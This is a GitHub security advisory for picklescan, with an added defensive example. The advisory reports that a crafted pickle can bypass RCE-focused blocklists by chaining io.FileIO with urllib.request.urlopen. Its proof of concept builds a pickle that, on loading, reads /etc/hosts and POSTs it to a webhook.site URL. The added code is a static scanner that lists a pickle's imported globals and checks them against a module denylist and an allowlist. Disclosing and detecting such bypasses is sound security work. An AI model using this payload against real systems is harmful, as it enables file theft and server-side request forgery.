GHSA-9726-w42j-3qjr

Published: 08 Jan 2026
Source: github
Github: Reviewed
CVSS4: 8.8

Description

picklescan has Arbitrary file read using io.FileIO

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.

  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.

  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

    import pickle, io, urllib.request

    class GetFile:
        def __reduce__(self):
            # On load this becomes io.FileIO('/etc/hosts', 'r')
            return (io.FileIO, ('/etc/hosts', 'r'))

    class Exfiltrate:
        def __reduce__(self):
            # On load this becomes urlopen(url, data=<file object>), sending the file as the POST body
            return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

    with open("bypass_http.pkl", "wb") as f:
        pickle.dump(Exfiltrate(), f)

Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE-type vulnerabilities and that adding file I/O, HTTP or other protocol-based checks may cause a lot of noise, feel free to close this issue.
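
Added example, not part of the advisory or of picklescan's code: a static check that lists the globals a pickle would import without loading it, showing that the stream described under Details passes an RCE-only denylist but fails an allowlist. The denylist, the allowlist, the function names and the sample bytes are assumptions constructed for illustration.

```python
import pickletools

# Hypothetical RCE-only module denylist for comparison (not picklescan's real list).
RCE_DENYLIST = {"os", "posix", "nt", "subprocess", "builtins"}
# Hypothetical allowlist for a service that expects only plain containers.
ALLOWED = {("collections", "OrderedDict")}

# Constructed protocol-0 stream shaped like the PoC: urlopen(url, FileIO(path, "r")).
# It is only parsed here, never unpickled; example.invalid is a placeholder.
SAMPLE = (b"curllib.request\nurlopen\n(Vhttps://example.invalid/\n"
          b"cio\nFileIO\n(V/etc/hosts\nVr\ntRtR.")

STRING_OPS = {"UNICODE", "SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8",
              "STRING", "SHORT_BINSTRING", "BINSTRING"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}

def referenced_globals(data):
    """List the (module, name) imports a pickle requests, without loading it."""
    found, strings, memo, top = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "MEMOIZE":             # memo slot = current memo size
            memo[len(memo)] = top
        elif op.name in PUT_OPS:
            memo[arg] = top
        elif op.name in ("GLOBAL", "INST"):  # arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
            top = None
        elif op.name == "STACK_GLOBAL":      # module and name were pushed as strings
            pair = tuple(strings[-2:])
            found.append(pair if len(pair) == 2 else ("?", "?"))  # fail closed
            top = None
        else:
            # Simplified stack model: only string pushes and memo reads are tracked.
            top = arg if op.name in STRING_OPS else (
                memo.get(arg) if op.name in GET_OPS else None)
            if isinstance(top, str):
                strings.append(top)
    return found

def rce_denylist_hits(data):
    return [g for g in referenced_globals(data)
            if g[0].split(".")[0] in RCE_DENYLIST]

def not_allowlisted(data):
    return [g for g in referenced_globals(data) if g not in ALLOWED]

if __name__ == "__main__":
    print(rce_denylist_hits(SAMPLE), not_allowlisted(SAMPLE))
```

When the standard pickler serializes a reference to io.FileIO it records the class under its defining module, _io, so a name-based rule has to cover both spellings; the allowlist check is unaffected.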

Packages

Name: picklescan
Ecosystem: pip
Affected versions: < 0.0.35
Fixed version: 0.0.35

8.8 High (CVSS4)

Weaknesses

CWE-22
CWE-918
